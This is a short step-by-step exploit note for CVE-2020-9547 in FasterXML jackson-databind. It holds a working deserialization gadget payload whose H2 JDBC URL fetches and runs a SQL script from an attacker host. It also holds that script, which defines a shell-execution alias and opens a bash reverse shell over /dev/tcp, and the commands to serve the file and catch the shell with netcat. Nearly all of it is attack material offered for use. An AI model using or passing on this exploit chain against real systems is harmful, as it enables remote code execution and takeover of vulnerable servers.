CVE-2020-9547: FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).
1. Payload:
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPTFROM'http://10.10.xx.xx:443/sql.sql'"}]
2. Create file sql.sql with the target command
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i &>/dev/tcp/10.10.xxx.xxx/4444 0>&1 &')
3. python -m SimpleHTTPServer 443
4. nc -lvp 4444